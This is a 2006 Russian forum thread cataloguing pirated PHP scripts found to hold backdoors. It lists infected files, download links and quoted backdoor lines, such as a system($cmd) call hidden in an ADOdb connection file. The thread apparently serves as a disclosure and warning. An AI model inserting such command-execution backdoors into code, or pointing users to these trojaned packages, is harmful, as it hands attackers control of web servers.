Затрояненные скрипты.

Discussion in 'PHP' started by k1b0rg, 15 Oct 2006.

  1. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    Выкладываем сюда, все скрипты в которые встроенны черные ходы, шеллы, маячки и т.д.
    В формате:

    1) Название скрипта
    2) Файлы которые заражены.
    3) Сайт откуда был скачен скрипт.
     
    3 people like this.
  2. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    1) Vbulletin 3.6.1 занулен SCRiPTMAFiA
    2) includes/class_dm_announcement.php Встроен nst шелл.
    3) http://s3m.ru/files/VBulletinv361_PHP_NULL.zip
     
    #2 k1b0rg, 15 Oct 2006
    Last edited: 16 Oct 2006
  3. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    1) PHPrpg
    2) leap.php весь файл это php remview шелл
    3) http://rapidshare.de/files/25349919/phprpg.rar
     
  4. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    1) Strike Project
    2) leap.php весь файл это php remview шелл
    3) http://rapidshare.de/files/25350055/strikerpg.rar

    Как и предыдущий скрипт, выложены в скрипт-паке он-лайн игр
     
    1 person likes this.
  5. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    1) AlstraSoft.Template.Seller.Pro v3.21.PHP.NULL-WDYL
    2) include/adodb/adodb-connetcion.inc.php содержит строки ADOConnection::eek:utp( "CacheFlush: $cmd<br><pre>\n", system($cmd),"</pre>");
    3) Был взят из какого-то cms пака.


    1) Netcat standart 2.3
    2) netcat/admin/dump.inc.php содержит код system($cmd);
    3) скачан из cms пака от monsterteam.info
     
    #5 k1b0rg, 16 Oct 2006
    Last edited: 16 Oct 2006
  6. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Извиняюсь, конечно за оффтоп, но нельзя ли бы указывать полную инфу...
    Например:
    ТОльео название скрипта, а кем занулена версия?